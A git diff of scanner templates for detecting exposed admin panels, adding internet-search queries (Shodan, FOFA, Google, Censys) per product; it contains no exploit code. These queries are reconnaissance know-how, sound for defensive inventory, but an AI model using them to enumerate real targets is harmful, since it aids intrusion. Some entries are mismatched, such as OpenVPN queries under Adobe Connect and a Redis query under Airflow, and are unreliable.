b/http/exposed-panels/activemq-panel.yaml @@ -12,8 +12,11 @@ info: cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: activemq vendor: apache + product: activemq + shodan-query: + - cpe:"cpe:2.3:a:apache:activemq" + - product:"activemq openwire transport" tags: panel,activemq,apache http: diff --git a/http/exposed-panels/acunetix-login.yaml b/http/exposed-panels/acunetix-login.yaml index 1fde288b23..582c056aac 100644 --- a/http/exposed-panels/acunetix-login.yaml +++ b/http/exposed-panels/acunetix-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Acunetix" - verified: true tags: panel,acunetix http: diff --git a/http/exposed-panels/addonfinance-portal.yaml b/http/exposed-panels/addonfinance-portal.yaml index 204507ff2e..159c1d8ada 100644 --- a/http/exposed-panels/addonfinance-portal.yaml +++ b/http/exposed-panels/addonfinance-portal.yaml @@ -6,9 +6,9 @@ info: severity: info description: AddOnFinance Portal Panel was detected. metadata: + verified: "true" max-request: 1 shodan-query: title:"AddOnFinancePortal" - verified: "true" tags: panel,addon,finance,detect http: diff --git a/http/exposed-panels/adhoc-transfer-panel.yaml b/http/exposed-panels/adhoc-transfer-panel.yaml index d49d385a39..2721f51b07 100644 --- a/http/exposed-panels/adhoc-transfer-panel.yaml +++ b/http/exposed-panels/adhoc-transfer-panel.yaml @@ -6,11 +6,22 @@ info: severity: info description: WS_FTP Ad Hoc panel was detected. metadata: - max-request: 1 - product: ws_ftp - shodan-query: http.title:"Ad Hoc Transfer" - vendor: progress verified: true + max-request: 1 + vendor: progress + product: ws_ftp + shodan-query: + - http.title:"Ad Hoc Transfer" + - ws_ftp port:22 + - http.title:"ad hoc transfer" + - http.title:"ws_ftp server web transfer" + fofa-query: + - title="ws_ftp server web transfer" + - title="ad hoc transfer" + google-query: + - intitle:"ws_ftp server web transfer" + - intitle:"ad hoc transfer" + censys-query: services.http.request.uri="*/thinclient/wtm/public/index.html" tags: panel,wsftp,ad-hoc,detect,login,progress http: diff --git a/http/exposed-panels/adiscon-loganalyzer.yaml b/http/exposed-panels/adiscon-loganalyzer.yaml index 784bfe9f8a..a1bf3da61d 100644 --- a/http/exposed-panels/adiscon-loganalyzer.yaml +++ b/http/exposed-panels/adiscon-loganalyzer.yaml @@ -14,8 +14,8 @@ info: cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: loganalyzer vendor: adiscon + product: loganalyzer tags: adiscon,loganalyzer,syslog,exposure,panel http: diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index 8beeab25b4..848589f8d1 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -13,8 +13,16 @@ info: cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 741 - product: adminer vendor: adminer + product: adminer + shodan-query: + - cpe:"cpe:2.3:a:adminer:adminer" + - http.title:"login - adminer" + fofa-query: + - title="login - adminer" + - app="adminer" && body="4.7.8" + hunter-query: app.name="adminer"&&web.body="4.7.8" + google-query: intitle:"login - adminer" tags: panel,fuzz,adminer,login,sqli http: diff --git a/http/exposed-panels/adminer-panel.yaml b/http/exposed-panels/adminer-panel.yaml index e9543e8b03..132301fc15 100644 --- a/http/exposed-panels/adminer-panel.yaml +++ b/http/exposed-panels/adminer-panel.yaml @@ -11,11 +11,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: - max-request: 8 - product: adminer - shodan-query: title:"Login - Adminer" - vendor: adminer verified: true + max-request: 8 + vendor: adminer + product: adminer + shodan-query: + - title:"Login - Adminer" + - cpe:"cpe:2.3:a:adminer:adminer" + - http.title:"login - adminer" + fofa-query: + - title="login - adminer" + - app="adminer" && body="4.7.8" + hunter-query: app.name="adminer"&&web.body="4.7.8" + google-query: intitle:"login - adminer" tags: panel,adminer http: diff --git a/http/exposed-panels/adminset-panel.yaml b/http/exposed-panels/adminset-panel.yaml index 48c5d1a42f..7a2b289842 100644 --- a/http/exposed-panels/adminset-panel.yaml +++ b/http/exposed-panels/adminset-panel.yaml @@ -8,8 +8,8 @@ info: classification: cwe-id: CWE-200 metadata: - fofa-query: app="AdminSet" max-request: 1 + fofa-query: app="AdminSet" reference: - https://github.com/guhongze/adminset/ tags: adminset,panel diff --git a/http/exposed-panels/adobe/adobe-component-login.yaml b/http/exposed-panels/adobe/adobe-component-login.yaml index 1c53d8de87..a3f231c71a 100644 --- a/http/exposed-panels/adobe/adobe-component-login.yaml +++ b/http/exposed-panels/adobe/adobe-component-login.yaml @@ -12,9 +12,17 @@ info: cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" vendor: adobe + product: coldfusion + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="adobe-coldfusion" + - title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: panel,adobe,coldfusion,edb http: diff --git a/http/exposed-panels/adobe/adobe-connect-central-login.yaml b/http/exposed-panels/adobe/adobe-connect-central-login.yaml index e8ce76b66a..ef465ca174 100644 --- a/http/exposed-panels/adobe/adobe-connect-central-login.yaml +++ b/http/exposed-panels/adobe/adobe-connect-central-login.yaml @@ -12,8 +12,11 @@ info: cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: connect vendor: adobe + product: connect + shodan-query: http.title:"openvpn connect" + fofa-query: title="openvpn connect" + google-query: intitle:"openvpn connect" tags: adobe,panel,connect-central http: diff --git a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml index 7cbef5bf80..305804d2c7 100644 --- a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml +++ b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml @@ -12,9 +12,15 @@ info: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: experience_manager - shodan-query: http.title:"AEM Sign In" vendor: adobe + product: experience_manager + shodan-query: + - http.title:"AEM Sign In" + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: panel,aem,adobe http: diff --git a/http/exposed-panels/adobe/aem-crx-package-manager.yaml b/http/exposed-panels/adobe/aem-crx-package-manager.yaml index 40889640a4..189a8ca8b0 100644 --- a/http/exposed-panels/adobe/aem-crx-package-manager.yaml +++ b/http/exposed-panels/adobe/aem-crx-package-manager.yaml @@ -13,11 +13,16 @@ info: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - vendor: adobe + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: panel,aem,adobe http: diff --git a/http/exposed-panels/adobe/aem-sling-login.yaml b/http/exposed-panels/adobe/aem-sling-login.yaml index d44f6ecd73..e97a29effe 100644 --- a/http/exposed-panels/adobe/aem-sling-login.yaml +++ b/http/exposed-panels/adobe/aem-sling-login.yaml @@ -13,11 +13,16 @@ info: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - vendor: adobe + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: panel,aem,adobe,sling http: diff --git a/http/exposed-panels/aircube-dashboard-panel.yaml b/http/exposed-panels/aircube-dashboard-panel.yaml index 76e6a57eea..5366b7d2b5 100644 --- a/http/exposed-panels/aircube-dashboard-panel.yaml +++ b/http/exposed-panels/aircube-dashboard-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"AirCube Dashboard" - verified: true tags: panel,aircube http: diff --git a/http/exposed-panels/aircube-login.yaml b/http/exposed-panels/aircube-login.yaml index e0dee7f194..17523cdbb2 100644 --- a/http/exposed-panels/aircube-login.yaml +++ b/http/exposed-panels/aircube-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1249285083 - verified: true tags: panel,aircube,ubiquiti http: diff --git a/http/exposed-panels/airflow-panel.yaml b/http/exposed-panels/airflow-panel.yaml index c7beb91b2f..2a8e11bb47 100644 --- a/http/exposed-panels/airflow-panel.yaml +++ b/http/exposed-panels/airflow-panel.yaml @@ -13,9 +13,20 @@ info: cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: airflow - shodan-query: title:"Sign In - Airflow" vendor: apache + product: airflow + shodan-query: + - title:"Sign In - Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" tags: panel,apache,airflow,admin http: diff --git a/http/exposed-panels/airnotifier-panel.yaml b/http/exposed-panels/airnotifier-panel.yaml index 4120df8a00..71b8f12080 100644 --- a/http/exposed-panels/airnotifier-panel.yaml +++ b/http/exposed-panels/airnotifier-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"AirNotifier" - verified: true tags: panel,airnotifier http: diff --git a/http/exposed-panels/akamai-cloudtest.yaml b/http/exposed-panels/akamai-cloudtest.yaml index 1c18156638..25af9fef39 100644 --- a/http/exposed-panels/akamai-cloudtest.yaml +++ b/http/exposed-panels/akamai-cloudtest.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:akamai:cloudtest:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: cloudtest vendor: akamai + product: cloudtest tags: panel,akamai http: diff --git a/http/exposed-panels/alfresco-detect.yaml b/http/exposed-panels/alfresco-detect.yaml index 23c7abb560..04a6c1f98e 100644 --- a/http/exposed-panels/alfresco-detect.yaml +++ b/http/exposed-panels/alfresco-detect.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:android:*:*:* metadata: max-request: 1 - product: alfresco vendor: alfresco + product: alfresco tags: alfresco,tech,panel http: diff --git a/http/exposed-panels/algonomia-panel.yaml b/http/exposed-panels/algonomia-panel.yaml index 5977b70308..ed444a32bb 100644 --- a/http/exposed-panels/algonomia-panel.yaml +++ b/http/exposed-panels/algonomia-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://algonomia.com/ metadata: - max-request: 1 verified: true - tags: tech,algonomia,detect + max-request: 1 + tags: tech,algonomia,detect,panel http: - method: GET diff --git a/http/exposed-panels/allied-telesis-exposure.yaml b/http/exposed-panels/allied-telesis-exposure.yaml index b8e48488e2..faa4e217e2 100644 --- a/http/exposed-panels/allied-telesis-exposure.yaml +++ b/http/exposed-panels/allied-telesis-exposure.yaml @@ -11,11 +11,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 - product: device_gui - shodan-query: title:"Allied Telesis Device GUI" - vendor: allied_telesis verified: true + max-request: 1 + vendor: allied_telesis + product: device_gui + shodan-query: + - title:"Allied Telesis Device GUI" + - http.title:"allied telesis device gui" + fofa-query: title="allied telesis device gui" + google-query: intitle:"allied telesis device gui" tags: panel,allied,allied_telesis http: diff --git a/http/exposed-panels/ambari-exposure.yaml b/http/exposed-panels/ambari-exposure.yaml index bb84700507..64299bb819 100644 --- a/http/exposed-panels/ambari-exposure.yaml +++ b/http/exposed-panels/ambari-exposure.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:apache:ambari:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: ambari vendor: apache + product: ambari tags: panel,apache,ambari,exposure http: diff --git a/http/exposed-panels/amcrest-login.yaml b/http/exposed-panels/amcrest-login.yaml index 48ae7581eb..146e5c5f40 100644 --- a/http/exposed-panels/amcrest-login.yaml +++ b/http/exposed-panels/amcrest-login.yaml @@ -11,11 +11,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:amcrest:ip2m-853ew:*:*:*:*:*:*:*:* metadata: - google-query: intext:"amcrest" "LDAP User" max-request: 1 - product: ip2m-853ew - shodan-query: html:"amcrest" vendor: amcrest + product: ip2m-853ew + shodan-query: + - html:"amcrest" + - http.html:"amcrest" "ldap user" + - http.html:"amcrest" + google-query: + - intext:"amcrest" "LDAP User" + - intext:"amcrest" "ldap user" + fofa-query: + - body="amcrest" "ldap user" + - body="amcrest" tags: panel,camera,amcrest,edb http: diff --git a/http/exposed-panels/ametys-admin-login.yaml b/http/exposed-panels/ametys-admin-login.yaml index 33bacdeae1..bad170bb8d 100644 --- a/http/exposed-panels/ametys-admin-login.yaml +++ b/http/exposed-panels/ametys-admin-login.yaml @@ -10,8 +10,8 @@ info: cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: ametys vendor: ametys + product: ametys tags: panel,ametys,cms http: diff --git a/http/exposed-panels/amp-application-panel.yaml b/http/exposed-panels/amp-application-panel.yaml index ffbe2c2331..51f9e366e1 100644 --- a/http/exposed-panels/amp-application-panel.yaml +++ b/http/exposed-panels/amp-application-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:cubecoders:amp:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: amp - shodan-query: title:"AMP - Application Management Panel" - vendor: cubecoders verified: true + max-request: 1 + vendor: cubecoders + product: amp + shodan-query: + - title:"AMP - Application Management Panel" + - http.title:"amp - application management panel" + fofa-query: title="amp - application management panel" + google-query: intitle:"amp - application management panel" tags: panel,amp,cubecoders http: diff --git a/http/exposed-panels/ampache-panel.yaml b/http/exposed-panels/ampache-panel.yaml index 1efadb34ec..72ba6b1385 100644 --- a/http/exposed-panels/ampache-panel.yaml +++ b/http/exposed-panels/ampache-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: ampache - shodan-query: http.title:"For the Love of Music" - vendor: ampache verified: true + max-request: 3 + vendor: ampache + product: ampache + shodan-query: + - http.title:"For the Love of Music" + - http.title:"for the love of music" + fofa-query: title="for the love of music" + google-query: intitle:"for the love of music" tags: panel,ampache http: diff --git a/http/exposed-panels/amprion-gridloss-panel.yaml b/http/exposed-panels/amprion-gridloss-panel.yaml index 6ec032abcf..51f0f04c87 100644 --- a/http/exposed-panels/amprion-gridloss-panel.yaml +++ b/http/exposed-panels/amprion-gridloss-panel.yaml @@ -9,9 +9,10 @@ info: reference: - https://www.amprion.net/index-2.html metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,amprion,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/anaqua-login-panel.yaml b/http/exposed-panels/anaqua-login-panel.yaml index 910fd83a12..adbd593574 100644 --- a/http/exposed-panels/anaqua-login-panel.yaml +++ b/http/exposed-panels/anaqua-login-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Anaqua User Sign On"" - verified: true tags: anaqua,login,panel http: diff --git a/http/exposed-panels/ansible-tower-exposure.yaml b/http/exposed-panels/ansible-tower-exposure.yaml index 61046db509..d58317efab 100644 --- a/http/exposed-panels/ansible-tower-exposure.yaml +++ b/http/exposed-panels/ansible-tower-exposure.yaml @@ -13,11 +13,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"Ansible Tower" max-request: 1 - product: ansible_tower - shodan-query: title:"Ansible Tower" vendor: redhat + product: ansible_tower + shodan-query: + - title:"Ansible Tower" + - http.title:"ansible tower" + google-query: + - intitle:"Ansible Tower" + - intitle:"ansible tower" + fofa-query: title="ansible tower" tags: panel,ansible,redhat http: diff --git a/http/exposed-panels/apache-jmeter-dashboard.yaml b/http/exposed-panels/apache-jmeter-dashboard.yaml index e104e72e0b..7e9ea40999 100644 --- a/http/exposed-panels/apache-jmeter-dashboard.yaml +++ b/http/exposed-panels/apache-jmeter-dashboard.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:jmeter:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: jmeter - shodan-query: title:"Apache JMeter Dashboard" - vendor: apache verified: true + max-request: 1 + vendor: apache + product: jmeter + shodan-query: + - title:"Apache JMeter Dashboard" + - http.title:"apache jmeter dashboard" + fofa-query: title="apache jmeter dashboard" + google-query: intitle:"apache jmeter dashboard" tags: apache,jmeter,panel http: diff --git a/http/exposed-panels/apache/apache-apisix-panel.yaml b/http/exposed-panels/apache/apache-apisix-panel.yaml index d34749989a..e8cd396ebe 100644 --- a/http/exposed-panels/apache/apache-apisix-panel.yaml +++ b/http/exposed-panels/apache/apache-apisix-panel.yaml @@ -10,9 +10,13 @@ info: cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: apisix vendor: apache - fofa-query: title="Apache APISIX Dashboard" + product: apisix + fofa-query: + - title="Apache APISIX Dashboard" + - title="apache apisix dashboard" + shodan-query: http.title:"apache apisix dashboard" + google-query: intitle:"apache apisix dashboard" tags: apache,apisix,panel,login,detect http: diff --git a/http/exposed-panels/apache/apache-mesos-panel.yaml b/http/exposed-panels/apache/apache-mesos-panel.yaml index b482f4fd1b..1396e99511 100644 --- a/http/exposed-panels/apache/apache-mesos-panel.yaml +++ b/http/exposed-panels/apache/apache-mesos-panel.yaml @@ -10,12 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:mesos:*:*:*:*:jenkins:*:*:* metadata: - fofa-query: app="APACHE-MESOS" - max-request: 2 - product: mesos - shodan-query: http.title:"Mesos" - vendor: apache verified: true + max-request: 2 + vendor: apache + product: mesos + shodan-query: + - http.title:"Mesos" + - http.title:"mesos" + fofa-query: + - app="APACHE-MESOS" + - app="apache-mesos" + - title="mesos" + google-query: intitle:"mesos" tags: panel,apache,mesos http: diff --git a/http/exposed-panels/apache/public-tomcat-manager.yaml b/http/exposed-panels/apache/public-tomcat-manager.yaml index f7cd1ea593..adb6e5a994 100644 --- a/http/exposed-panels/apache/public-tomcat-manager.yaml +++ b/http/exposed-panels/apache/public-tomcat-manager.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: tomcat - shodan-query: title:"Apache Tomcat" vendor: apache + product: tomcat + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" tags: panel,tomcat,apache http: diff --git a/http/exposed-panels/apigee-panel.yaml b/http/exposed-panels/apigee-panel.yaml index bd38bff268..ab86f4551c 100644 --- a/http/exposed-panels/apigee-panel.yaml +++ b/http/exposed-panels/apigee-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://cloud.google.com/apigee?hl=en metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:"-839356603" - verified: true tags: panel,apigee,login http: diff --git a/http/exposed-panels/appsmith-web-login.yaml b/http/exposed-panels/appsmith-web-login.yaml index b28180205b..b3c2f57b8b 100644 --- a/http/exposed-panels/appsmith-web-login.yaml +++ b/http/exposed-panels/appsmith-web-login.yaml @@ -12,11 +12,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: appsmith product: appsmith shodan-query: http.title:"appsmith" - vendor: appsmith - verified: true + fofa-query: title="appsmith" + google-query: intitle:"appsmith" tags: panel,appsmith http: diff --git a/http/exposed-panels/appspace-panel.yaml b/http/exposed-panels/appspace-panel.yaml index f571068619..4e017054a6 100644 --- a/http/exposed-panels/appspace-panel.yaml +++ b/http/exposed-panels/appspace-panel.yaml @@ -10,11 +10,15 @@ info: classification: cpe: cpe:2.3:a:appspace:appspace:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: appspace - shodan-query: title:"Appspace" - vendor: appspace verified: true + max-request: 3 + vendor: appspace + product: appspace + shodan-query: + - title:"Appspace" + - http.title:"appspace" + fofa-query: title="appspace" + google-query: intitle:"appspace" tags: appspace,panel,detect http: diff --git a/http/exposed-panels/appsuite-panel.yaml b/http/exposed-panels/appsuite-panel.yaml index b47bd4d72d..40e37628f1 100644 --- a/http/exposed-panels/appsuite-panel.yaml +++ b/http/exposed-panels/appsuite-panel.yaml @@ -7,11 +7,14 @@ info: classification: cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: open-xchange_appsuite - shodan-query: html:"Appsuite" - vendor: open-xchange verified: true + max-request: 1 + vendor: open-xchange + product: open-xchange_appsuite + shodan-query: + - html:"Appsuite" + - http.html:"appsuite" + fofa-query: body="appsuite" tags: panel,appsuite,detect,open-xchange http: diff --git a/http/exposed-panels/appwrite-panel.yaml b/http/exposed-panels/appwrite-panel.yaml index 4329c6b34e..071d3b6a73 100644 --- a/http/exposed-panels/appwrite-panel.yaml +++ b/http/exposed-panels/appwrite-panel.yaml @@ -10,11 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: appwrite - shodan-query: http.favicon.hash:-633108100 - vendor: appwrite verified: true + max-request: 2 + vendor: appwrite + product: appwrite + shodan-query: + - http.favicon.hash:-633108100 + - http.title:"sign in - appwrite" + fofa-query: + - icon_hash=-633108100 + - title="sign in - appwrite" + google-query: intitle:"sign in - appwrite" tags: panel,appwrite,detect http: diff --git a/http/exposed-panels/aqua-enterprise-panel.yaml b/http/exposed-panels/aqua-enterprise-panel.yaml index 45ed002380..91679567c9 100644 --- a/http/exposed-panels/aqua-enterprise-panel.yaml +++ b/http/exposed-panels/aqua-enterprise-panel.yaml @@ -12,10 +12,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Aqua Cloud Native Security Platform" + verified: true max-request: 1 shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform" - verified: true + google-query: intitle:"Aqua Cloud Native Security Platform" tags: panel,aqua,aquasec http: diff --git a/http/exposed-panels/arangodb-web-Interface.yaml b/http/exposed-panels/arangodb-web-Interface.yaml index 2b2ff1ee32..468a0071ff 100644 --- a/http/exposed-panels/arangodb-web-Interface.yaml +++ b/http/exposed-panels/arangodb-web-Interface.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:arangodb:arangodb:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: arangodb - shodan-query: http.title:"ArangoDB Web Interface" - vendor: arangodb verified: "true" + max-request: 1 + vendor: arangodb + product: arangodb + shodan-query: + - http.title:"ArangoDB Web Interface" + - http.title:"arangodb web interface" + fofa-query: title="arangodb web interface" + google-query: intitle:"arangodb web interface" tags: panel,arangodb,login http: diff --git a/http/exposed-panels/arcgis/arcgis-panel.yaml b/http/exposed-panels/arcgis/arcgis-panel.yaml index 3d7e132178..f003193952 100644 --- a/http/exposed-panels/arcgis/arcgis-panel.yaml +++ b/http/exposed-panels/arcgis/arcgis-panel.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:esri:arcgis_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: arcgis_enterprise vendor: esri + product: arcgis_enterprise tags: docs,arcgis,cms,panel,esri http: diff --git a/http/exposed-panels/arcgis/arcgis-services.yaml b/http/exposed-panels/arcgis/arcgis-services.yaml index df59cea6e3..35107c252e 100644 --- a/http/exposed-panels/arcgis/arcgis-services.yaml +++ b/http/exposed-panels/arcgis/arcgis-services.yaml @@ -10,11 +10,15 @@ info: classification: cpe: cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: arcgis_server - shodan-query: title:"ArcGIS" - vendor: esri verified: true + max-request: 1 + vendor: esri + product: arcgis_server + shodan-query: + - title:"ArcGIS" + - http.title:"arcgis" + fofa-query: title="arcgis" + google-query: intitle:"arcgis" tags: panel,arcgis,rest,api,detect,esri http: diff --git a/http/exposed-panels/archibus-webcentral-panel.yaml b/http/exposed-panels/archibus-webcentral-panel.yaml index de30e0b585..2276991da2 100644 --- a/http/exposed-panels/archibus-webcentral-panel.yaml +++ b/http/exposed-panels/archibus-webcentral-panel.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:archibus:web_central:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 3 + vendor: archibus product: web_central shodan-query: http.favicon.hash:889652940 - vendor: archibus - verified: true + fofa-query: icon_hash=889652940 tags: panel,archibus http: diff --git a/http/exposed-panels/arcserve-panel.yaml b/http/exposed-panels/arcserve-panel.yaml index 4b8a7cacf1..8bb7f4ae8a 100644 --- a/http/exposed-panels/arcserve-panel.yaml +++ b/http/exposed-panels/arcserve-panel.yaml @@ -10,12 +10,14 @@ info: classification: cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:* metadata: - fofa-query: icon_hash="-1889244460" - max-request: 1 - product: udp - shodan-query: http.favicon.hash:-1889244460 - vendor: arcserve verified: true + max-request: 1 + vendor: arcserve + product: udp + shodan-query: + - http.favicon.hash:-1889244460 + - http.favicon.hash:"-1889244460" + fofa-query: icon_hash="-1889244460" tags: panel,login,arcserve,detect http: diff --git a/http/exposed-panels/arris-modem-detect.yaml b/http/exposed-panels/arris-modem-detect.yaml index 85b31d31f7..fef2d3039a 100644 --- a/http/exposed-panels/arris-modem-detect.yaml +++ b/http/exposed-panels/arris-modem-detect.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:commscope:dg3450:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: dg3450 - shodan-query: html:"phy.htm" - vendor: commscope verified: true + max-request: 1 + vendor: commscope + product: dg3450 + shodan-query: + - html:"phy.htm" + - http.html:"phy.htm" + fofa-query: body="phy.htm" tags: panel,arris,commscope http: diff --git a/http/exposed-panels/aspcms-backend-panel.yaml b/http/exposed-panels/aspcms-backend-panel.yaml index 81821166f4..b66513dd63 100644 --- a/http/exposed-panels/aspcms-backend-panel.yaml +++ b/http/exposed-panels/aspcms-backend-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/GREENHAT7/pxplan/blob/main/goby_pocs/Aspcms_Backend_Leak.json metadata: - fofa-query: app="ASPCMS" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="ASPCMS" tags: panel,login,aspcms,admin http: diff --git a/http/exposed-panels/aspect-control-panel.yaml b/http/exposed-panels/aspect-control-panel.yaml index 1ca2d40872..7f970b86f1 100644 --- a/http/exposed-panels/aspect-control-panel.yaml +++ b/http/exposed-panels/aspect-control-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1011076161 - verified: true tags: panel,aspect,login http: diff --git a/http/exposed-panels/asus-aicloud-panel.yaml b/http/exposed-panels/asus-aicloud-panel.yaml index 035b14eb56..b226835914 100644 --- a/http/exposed-panels/asus-aicloud-panel.yaml +++ b/http/exposed-panels/asus-aicloud-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.asus.com/in/content/aicloud/ metadata: + verified: "true" max-request: 1 shodan-query: title:"AiCloud" - verified: "true" tags: panel,asus,aicloud,detect http: diff --git a/http/exposed-panels/asus-router-panel.yaml b/http/exposed-panels/asus-router-panel.yaml index 50dfe3aca4..58f49474f4 100644 --- a/http/exposed-panels/asus-router-panel.yaml +++ b/http/exposed-panels/asus-router-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: 'Server: httpd/2.0 port:8080' - verified: true tags: panel,asus,router,iot http: diff --git 